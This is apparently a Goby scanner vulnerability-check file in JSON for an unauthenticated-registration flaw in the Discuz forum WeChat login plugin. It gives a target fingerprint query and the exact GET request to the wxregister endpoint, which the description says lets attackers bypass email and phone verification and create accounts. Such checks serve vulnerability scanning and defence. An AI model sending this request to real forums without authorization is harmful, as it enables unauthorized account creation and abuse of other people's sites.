Goby/json/Discuz_Wechat_Plugins_Unaut...

83 lines
3.3 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Discuz Wechat Plugins Unauth",
"Level": "2",
"Tags": [
"unauth"
],
"GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")",
"Description": "由Discuz论坛官方微信登录插件产生攻击者可以利用该插件的漏洞绕过论坛的邮箱、手机号等各种验证非法创建论坛账号通过该漏洞创建的论坛账号具备一般用户的所有权限可以任意发帖回帖.",
"Product": "discuz",
"Homepage": "https://www.discuz.net/",
"Author": "aetkrad",
"Impact": "",
"Recommendation": "",
"References": [
"https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI"
],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/plugin.php?id=wechat:wechat&ac=wxregister",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "302",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "wsq.discuz.com",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "set-cookie",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "auth",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "location",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "2021-11-17 13:52:51",
"GobyVersion": "1.8.302"
}